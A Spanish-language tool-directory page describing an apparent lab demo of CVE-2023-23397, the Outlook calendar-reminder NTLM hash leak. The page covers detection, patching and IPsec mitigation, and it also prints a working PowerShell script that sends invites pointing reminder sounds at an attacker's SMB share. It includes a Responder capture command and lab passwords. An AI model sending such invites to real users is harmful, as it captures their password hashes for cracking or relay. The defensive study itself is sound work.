Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-23397 — Demostración de la vulnerabilidad CVE-2023-23397 de escalada de privilegios en Outlook | Kitploit
Herramientas/GitHubGitHub/gilospy/cve-2023-23397
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubgilospy/cve-2023-23397

CVE-2023-23397

Demostración de la vulnerabilidad CVE-2023-23397 de escalada de privilegios en Outlook

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-23397 Exploitation & Mitigation Demo

📌 Descripción general

Este proyecto demuestra la detección, explotación y mitigación de CVE-2023-23397, una vulnerabilidad crítica de retransmisión NTLM de cero clics en Microsoft Outlook para Windows. Explotada mediante invitaciones de calendario, esta vulnerabilidad permite a los atacantes capturar hashes NTLMv2 sin ninguna interacción del usuario.

🛡️ Puntuación CVSS: 9.8 (Crítico)
🖥️ Versiones afectadas: Outlook 2013, 2016, 2019, Microsoft 365 (antes del parche del 14 de marzo de 2023)


⚠️ Detalles de la vulnerabilidad

Los recordatorios del calendario de Outlook se pueden configurar para reproducir sonidos personalizados a través de la propiedad MAPI PidLidReminderFileParameter. Outlook no valida las rutas UNC, lo que permite solicitudes SMB remotas cuando se activan los recordatorios.

root@kitploit:~
\\attacker-ip\share\sound.wav

Esto hace que los hashes NTLMv2 se envíen a servidores controlados por el atacante, que pueden entonces:

  • Ser descifrados sin conexión (recuperación de contraseñas)
  • Usarse en ataques de retransmisión NTLM para escalada de privilegios

🔍 Método de detección

Use MFCMAPI para inspeccionar los elementos del calendario y comprobar si hay valores maliciosos en PidLidReminderFileParameter (etiqueta MAPI 0x851F001F).

Pasos:

  1. Abra MFCMAPI → QuickStart > Open Folder > Calendar
  2. Vaya a Table > Set Columns
  3. Agregue la etiqueta de propiedad 0x808A001F para ver las rutas de los archivos de recordatorio
  4. Busque rutas UNC como indicador de compromiso

🛠️ Técnicas de Mitigación

1. Aplicar el parche de Microsoft (Recomendado)

Instale el parche del 14 de marzo de 2023 (por ejemplo, KB5002044). El parche introduce:

  • IsFileZoneLocalIntranetOrTrusted() para validar las rutas de archivos de recordatorio
  • Opciones de directiva de grupo para definir dominios de confianza

Resultado de la prueba:
Outlook registrará el Event ID 1008 y bloqueará el acceso a rutas SMB no confiables.


2. Mitigación a nivel de red con IPsec (Temporal)

a. Bloquear todo el SMB

  • Bloquea el TCP 445 saliente (SMB)
  • Evita fugas de NTLM hacia redes no confiables

b. Permitir solo IPs de confianza

  • Define IPs internas (p. ej., 192.168.1.0/24)
  • Mantiene la continuidad del negocio para el uso interno de SMB

📂 Directiva predefinida: OutlookMitigation.ipsec


💻 Configuración del Proyecto

Entorno

SistemaUsuarioContraseña
Kali Linuxkalikali
Windows 10 VMCVE-2023-23397vbox@123
Cuenta de correo[email protected]

Atacante (Kali Linux)

root@kitploit:~
sudo apt install responder
sudo responder -I eth0 -v

Asegúrese de que Kali y la VM víctima están en la misma red.


Víctima (Windows + Outlook 2013)

  1. Instale:

    • Outlook 2013
    • .NET 2.0
    • hMailServer
    • MFCMAPI
  2. Configuración:

    • Dominio de hMailServer: exploit.com
    • Usuario de correo: [email protected]

🚨 Explotación (Script de PowerShell)

root@kitploit:~
# Initialize Outlook COM object
$Outlook = New-Object -ComObject Outlook.Application
$Namespace = $Outlook.GetNamespace("MAPI")
 
$ip = "192.168.1.7" # Attacker IP here
$emails = @("[email protected]")  # List of emails

# Create a new appointment item
$Appointment = $Outlook.CreateItem(1) # 1 corresponds to olAppointmentItem

# Set appointment properties
$Appointment.Subject = "CVE Presentation Demo Demo"
$Appointment.Body = "This is a test meeting, please ignore it."
$Appointment.Location = "Dubai"
$Appointment.Start = (Get-Date).AddSeconds(1) # Start time set to 1 second from now
$Appointment.Duration = 30 # Duration in minutes

# Configure reminder settings
$Appointment.ReminderSet = $true
$Appointment.ReminderMinutesBeforeStart = 0
$Appointment.ReminderOverrideDefault = $true
$Appointment.ReminderPlaySound = $true
$Appointment.ReminderSoundFile = "\\$ip\nonexistent\sound.wav"

foreach ($email in $emails) {
    $Appointment.Recipients.Add($email) | Out-Null
}

# Save and send the appointment
$Appointment.Save()
$Appointment.Send()

Responder capturará el hash NTLMv2 del sistema de la víctima.


✅ Verificación

Detección

  • Use MFCMAPI para confirmar que PidLidReminderFileParameter contiene una ruta UNC.

Mitigación

  • Aplique el parche o la directiva IPsec.
  • Vuelva a ejecutar el script: Outlook puede mostrar un recordatorio, pero no se debe capturar ningún hash NTLM.

❗ Limitaciones

  • Bloquear todo el tráfico SMB puede afectar a servicios legítimos (compartición de archivos, autenticación de dominio)
  • Mantener IPs de confianza puede resultar operativamente complejo

Descargar herramienta
vbox@123